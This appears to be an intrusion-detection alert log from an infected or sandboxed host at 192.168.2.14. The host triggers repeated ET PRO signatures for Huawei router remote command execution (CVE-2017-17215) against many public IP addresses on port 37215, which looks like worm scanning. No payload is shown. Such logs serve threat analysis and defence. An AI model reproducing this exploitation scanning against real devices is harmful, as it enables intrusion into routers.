                                                    07/10/24-08:27:22.841630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814437215192.168.2.14197.252.126.202
                                                    07/10/24-08:26:22.284234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869237215192.168.2.14157.157.198.22
                                                    07/10/24-08:26:25.469332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930637215192.168.2.14157.134.61.222
                                                    07/10/24-08:26:29.847797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854437215192.168.2.14157.246.140.58
                                                    07/10/24-08:26:33.225770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113637215192.168.2.14157.175.138.217
                                                    07/10/24-08:27:31.479200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150037215192.168.2.1441.214.60.66
                                                    07/10/24-08:27:32.538525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740237215192.168.2.1441.139.107.77
                                                    07/10/24-08:26:36.339944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070037215192.168.2.14157.204.9.235
                                                    07/10/24-08:26:53.209025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158637215192.168.2.14157.21.68.157
                                                    07/10/24-08:26:59.589721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639237215192.168.2.1441.164.75.91
                                                    07/10/24-08:27:33.915433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356037215192.168.2.14197.6.179.116
                                                    07/10/24-08:26:11.466916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626637215192.168.2.14157.10.89.64
                                                    07/10/24-08:26:57.505906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100037215192.168.2.1441.179.151.107
                                                    07/10/24-08:27:05.153820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948237215192.168.2.14157.166.97.53
                                                    07/10/24-08:26:48.005447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5804037215192.168.2.14197.162.32.148
                                                    07/10/24-08:26:47.930941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541637215192.168.2.1441.93.76.124
                                                    07/10/24-08:26:20.102730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486837215192.168.2.1446.63.247.86
                                                    07/10/24-08:26:26.585190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3305237215192.168.2.14174.216.252.36
                                                    07/10/24-08:27:28.179860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810437215192.168.2.14157.198.114.141
                                                    07/10/24-08:26:25.497334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935437215192.168.2.14197.206.154.165
                                                    07/10/24-08:26:49.866292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3378637215192.168.2.1441.160.229.215
                                                    07/10/24-08:27:31.520470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523037215192.168.2.14219.221.234.111
                                                    07/10/24-08:26:14.805928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724237215192.168.2.1441.154.61.145
                                                    07/10/24-08:26:22.296401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501437215192.168.2.14157.236.150.23
                                                    07/10/24-08:26:36.420530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848037215192.168.2.1414.115.12.131
                                                    07/10/24-08:27:13.978564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600237215192.168.2.14157.241.12.147
                                                    07/10/24-08:27:02.985576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280037215192.168.2.1441.130.40.118
                                                    07/10/24-08:26:31.103599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421837215192.168.2.1441.174.46.85
                                                    07/10/24-08:26:47.886738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978037215192.168.2.1441.116.62.253
                                                    07/10/24-08:26:49.768193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958637215192.168.2.1441.167.198.208
                                                    07/10/24-08:27:23.965651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931037215192.168.2.1441.63.161.6
                                                    07/10/24-08:26:20.098304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066837215192.168.2.14157.86.29.24
                                                    07/10/24-08:27:28.173873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980837215192.168.2.1441.29.120.224
                                                    07/10/24-08:26:41.405214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249437215192.168.2.14157.235.164.188
                                                    07/10/24-08:26:20.142588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894237215192.168.2.14157.70.89.1
                                                    07/10/24-08:26:36.358827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251037215192.168.2.1443.151.163.210
                                                    07/10/24-08:26:14.757846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085637215192.168.2.1441.234.135.223
                                                    07/10/24-08:26:17.949635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268437215192.168.2.1441.29.180.95
                                                    07/10/24-08:26:38.617704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394637215192.168.2.14156.136.11.40
                                                    07/10/24-08:26:22.262926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944237215192.168.2.14197.99.141.90
                                                    07/10/24-08:26:59.875965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161237215192.168.2.1441.218.238.130
                                                    07/10/24-08:27:19.284664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501037215192.168.2.14157.134.203.53
                                                    07/10/24-08:26:36.418170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5909037215192.168.2.14197.108.0.156
                                                    07/10/24-08:26:13.659815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131837215192.168.2.1460.167.215.107
                                                    07/10/24-08:26:33.217232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099837215192.168.2.14157.220.48.19
                                                    07/10/24-08:27:07.281764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755837215192.168.2.14157.69.139.156
                                                    07/10/24-08:26:14.623389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316837215192.168.2.14100.133.62.95
                                                    07/10/24-08:27:22.862864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183437215192.168.2.1441.200.180.192
                                                    07/10/24-08:27:20.495859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989437215192.168.2.1441.211.140.134
                                                    07/10/24-08:26:25.509517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098237215192.168.2.14157.54.37.88
                                                    07/10/24-08:26:45.676177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351037215192.168.2.1441.163.109.233
                                                    07/10/24-08:26:13.645814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5212037215192.168.2.14197.197.191.70
                                                    07/10/24-08:26:45.633431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913837215192.168.2.14157.131.165.165
                                                    07/10/24-08:26:14.811511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526037215192.168.2.1441.39.59.3
                                                    07/10/24-08:26:59.553942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5543437215192.168.2.14197.246.23.153
                                                    07/10/24-08:26:59.598591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945237215192.168.2.14197.61.174.158
                                                    07/10/24-08:26:14.801295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897437215192.168.2.14157.201.102.76
                                                    07/10/24-08:26:18.021892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190237215192.168.2.14197.9.13.76
                                                    07/10/24-08:27:22.799861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832437215192.168.2.14157.176.149.34
                                                    07/10/24-08:26:47.909610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451837215192.168.2.1441.107.50.33
                                                    07/10/24-08:26:26.596367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992037215192.168.2.14157.143.63.236
                                                    07/10/24-08:27:13.728066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576437215192.168.2.14157.72.133.123
                                                    07/10/24-08:27:29.338257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838037215192.168.2.1441.255.176.159
                                                    07/10/24-08:27:02.918054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351437215192.168.2.14157.249.67.79
                                                    07/10/24-08:26:38.569850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925037215192.168.2.14157.132.190.107
                                                    07/10/24-08:27:10.668166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311237215192.168.2.1442.165.46.53
                                                    07/10/24-08:27:22.835988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068637215192.168.2.1449.213.230.128
                                                    07/10/24-08:26:59.628167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925037215192.168.2.1441.68.31.142
                                                    07/10/24-08:27:11.557326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913237215192.168.2.14157.118.158.160
                                                    07/10/24-08:26:25.488012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3609037215192.168.2.14157.159.138.142
                                                    07/10/24-08:26:33.222774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181837215192.168.2.14116.157.195.170
                                                    07/10/24-08:27:31.479319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083637215192.168.2.1441.130.130.114
                                                    07/10/24-08:26:33.237467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253437215192.168.2.1441.138.43.145
                                                    07/10/24-08:27:02.726591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966837215192.168.2.14110.103.13.198
                                                    07/10/24-08:27:22.923054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375437215192.168.2.1473.79.226.164
                                                    07/10/24-08:26:59.717108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694037215192.168.2.14157.94.161.138
                                                    07/10/24-08:26:11.606817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908237215192.168.2.14157.53.146.11
                                                    07/10/24-08:26:41.438343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158637215192.168.2.14197.135.205.188
                                                    07/10/24-08:26:36.389134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534837215192.168.2.14157.130.157.225
                                                    07/10/24-08:26:33.222774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362837215192.168.2.14197.126.22.83
                                                    07/10/24-08:26:45.591326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792637215192.168.2.14197.230.248.51
                                                    07/10/24-08:26:33.214564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956837215192.168.2.14197.123.183.181
                                                    07/10/24-08:27:14.858579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735037215192.168.2.1441.5.72.80
                                                    07/10/24-08:26:45.660346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624837215192.168.2.14196.12.36.201
                                                    07/10/24-08:26:14.622674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737037215192.168.2.14157.35.232.144
                                                    07/10/24-08:26:20.123925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901037215192.168.2.14197.178.36.16
                                                    07/10/24-08:26:15.869114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627837215192.168.2.1441.254.106.223
                                                    07/10/24-08:26:59.801694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792837215192.168.2.14197.6.25.11
                                                    07/10/24-08:26:33.243364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331437215192.168.2.1441.2.220.176
                                                    07/10/24-08:26:28.916413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034637215192.168.2.14197.20.251.25
                                                    07/10/24-08:27:08.366132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883237215192.168.2.14157.177.55.159
                                                    07/10/24-08:26:38.594017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3390237215192.168.2.14197.95.113.167
                                                    07/10/24-08:27:07.384932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327637215192.168.2.14213.3.183.31
                                                    07/10/24-08:26:45.666546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679437215192.168.2.1451.88.156.72
                                                    07/10/24-08:26:41.475072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520237215192.168.2.14197.124.169.183
                                                    07/10/24-08:27:13.714524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929037215192.168.2.14179.219.194.60
                                                    07/10/24-08:27:22.571797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333237215192.168.2.1441.134.134.6
                                                    07/10/24-08:27:05.143503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761637215192.168.2.1441.101.81.172
                                                    07/10/24-08:27:08.454232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870437215192.168.2.14197.110.83.144
                                                    07/10/24-08:26:47.943853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700637215192.168.2.1441.56.38.238
                                                    07/10/24-08:26:53.176697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915437215192.168.2.14126.102.186.175
                                                    07/10/24-08:26:45.609280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921837215192.168.2.14157.72.155.125
                                                    07/10/24-08:26:33.173734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854637215192.168.2.14197.222.63.19
                                                    07/10/24-08:27:07.358183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650837215192.168.2.14157.26.207.64
                                                    07/10/24-08:26:31.102240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453037215192.168.2.14157.48.58.180
                                                    07/10/24-08:26:18.018737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057437215192.168.2.1454.31.206.163
                                                    07/10/24-08:26:28.698988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492037215192.168.2.14157.168.91.105
                                                    07/10/24-08:26:59.852225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491637215192.168.2.14197.206.187.169
                                                    07/10/24-08:26:20.175065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678037215192.168.2.1441.232.159.0
                                                    07/10/24-08:27:10.652052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680437215192.168.2.14157.211.88.12
                                                    07/10/24-08:26:28.841879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530837215192.168.2.14132.104.62.98
                                                    07/10/24-08:26:28.924774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064837215192.168.2.142.190.53.103
                                                    07/10/24-08:27:30.492988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4879237215192.168.2.1441.203.216.137
                                                    07/10/24-08:26:57.625074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913837215192.168.2.1492.48.216.192
                                                    07/10/24-08:27:05.190892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4340037215192.168.2.14104.126.215.142
                                                    07/10/24-08:26:47.827027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576437215192.168.2.14157.72.12.64
                                                    07/10/24-08:27:19.309217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880837215192.168.2.14197.229.151.55
                                                    07/10/24-08:27:31.545900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4020237215192.168.2.1441.205.239.85
                                                    07/10/24-08:26:18.020440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074637215192.168.2.14157.11.37.168
                                                    07/10/24-08:26:51.992041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322437215192.168.2.1441.198.103.76
                                                    07/10/24-08:27:05.160089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3514237215192.168.2.14187.106.72.51
                                                    07/10/24-08:26:11.493465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956437215192.168.2.14197.174.164.182
                                                    07/10/24-08:26:14.823553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362437215192.168.2.1438.161.32.31
                                                    07/10/24-08:27:17.060306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286637215192.168.2.1441.13.21.93
                                                    07/10/24-08:27:11.522078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797837215192.168.2.14197.94.223.92
                                                    07/10/24-08:27:13.973446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404637215192.168.2.1441.148.60.129
                                                    07/10/24-08:26:57.651213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367837215192.168.2.14197.56.116.79
                                                    07/10/24-08:27:02.942445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563237215192.168.2.14121.20.112.240
                                                    07/10/24-08:26:18.019424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648437215192.168.2.14197.177.74.156
                                                    07/10/24-08:26:47.939278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425037215192.168.2.14133.85.85.174
                                                    07/10/24-08:26:17.989941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783837215192.168.2.1470.33.66.206
                                                    07/10/24-08:26:59.554660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864637215192.168.2.1434.197.197.47
                                                    07/10/24-08:27:27.041359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540637215192.168.2.14197.26.131.43
                                                    07/10/24-08:26:57.565173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3980437215192.168.2.14137.161.76.140
                                                    07/10/24-08:27:07.366647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899837215192.168.2.14157.21.97.156
                                                    07/10/24-08:26:29.800404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050637215192.168.2.14157.86.147.125
                                                    07/10/24-08:26:59.657885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878037215192.168.2.14120.1.23.105
                                                    07/10/24-08:27:10.535959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516637215192.168.2.14157.170.234.208
                                                    07/10/24-08:27:08.383825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4380637215192.168.2.14157.106.152.226
                                                    07/10/24-08:26:20.159669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362037215192.168.2.1441.21.21.12
                                                    07/10/24-08:26:31.091003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686237215192.168.2.14197.104.173.213
                                                    07/10/24-08:26:38.641053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442237215192.168.2.14121.246.39.204
                                                    07/10/24-08:26:14.815685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298437215192.168.2.14197.204.243.61
                                                    07/10/24-08:27:07.245837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5465037215192.168.2.1441.15.239.157
                                                    07/10/24-08:27:20.517321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756437215192.168.2.14157.159.137.220
                                                    07/10/24-08:26:17.946996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969637215192.168.2.14157.235.101.243
                                                    07/10/24-08:26:29.866987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434637215192.168.2.14197.147.39.18
                                                    07/10/24-08:26:31.080592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163237215192.168.2.14197.220.126.38
                                                    07/10/24-08:27:27.029252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395037215192.168.2.14197.77.178.206
                                                    07/10/24-08:27:27.147329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783837215192.168.2.1441.95.27.83
                                                    07/10/24-08:27:14.851521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613237215192.168.2.1441.190.233.105
                                                    07/10/24-08:26:34.217028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905037215192.168.2.1441.220.193.132
                                                    07/10/24-08:27:10.751291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021637215192.168.2.1453.194.47.239
                                                    07/10/24-08:26:28.763825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414037215192.168.2.14113.77.143.158
                                                    07/10/24-08:26:41.372356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587837215192.168.2.14157.94.161.124
                                                    07/10/24-08:26:47.909293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461437215192.168.2.1441.80.151.67
                                                    07/10/24-08:27:10.558614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652237215192.168.2.1499.10.133.86
                                                    07/10/24-08:26:47.758583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121637215192.168.2.14157.15.233.229
                                                    07/10/24-08:27:10.657807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986237215192.168.2.14157.169.121.66
                                                    07/10/24-08:27:31.454702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946237215192.168.2.1441.23.94.93
                                                    07/10/24-08:26:57.574047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4698437215192.168.2.14157.173.26.78
                                                    07/10/24-08:27:22.532375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999437215192.168.2.1441.98.201.231
                                                    07/10/24-08:26:26.585966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939837215192.168.2.14157.54.180.250
                                                    07/10/24-08:27:24.962148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452037215192.168.2.1453.230.255.248
                                                    07/10/24-08:26:31.105929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5645437215192.168.2.14197.25.253.88
                                                    07/10/24-08:27:28.166168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742037215192.168.2.14157.211.17.147
                                                    07/10/24-08:26:34.190814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154237215192.168.2.14197.88.101.106
                                                    07/10/24-08:26:43.929800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493837215192.168.2.1418.253.221.208
                                                    07/10/24-08:26:42.404259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476037215192.168.2.14197.117.169.43
                                                    07/10/24-08:27:08.339308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559437215192.168.2.14120.32.22.196
                                                    07/10/24-08:27:22.802348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771037215192.168.2.14157.169.122.238
                                                    07/10/24-08:27:05.121517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797637215192.168.2.14157.9.12.116
                                                    07/10/24-08:27:10.625884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477637215192.168.2.1452.169.109.139
                                                    07/10/24-08:27:11.537830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904437215192.168.2.14157.112.220.143
                                                    07/10/24-08:26:34.254772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499237215192.168.2.1441.84.9.201
                                                    07/10/24-08:27:05.096875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733637215192.168.2.1441.79.198.48
                                                    07/10/24-08:26:22.288558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524037215192.168.2.1441.200.6.239
                                                    07/10/24-08:27:23.854070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308437215192.168.2.1443.111.125.136
                                                    07/10/24-08:26:59.623899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282837215192.168.2.14197.57.115.26
                                                    07/10/24-08:27:08.364400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979237215192.168.2.14157.17.219.48
                                                    07/10/24-08:26:42.169251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232637215192.168.2.14157.236.201.36
                                                    07/10/24-08:27:33.803873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013637215192.168.2.14103.236.71.221
                                                    07/10/24-08:26:34.233707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332637215192.168.2.1441.243.98.14
                                                    07/10/24-08:26:33.250485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710437215192.168.2.14197.194.182.241
                                                    07/10/24-08:27:30.469878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578037215192.168.2.14157.119.16.83
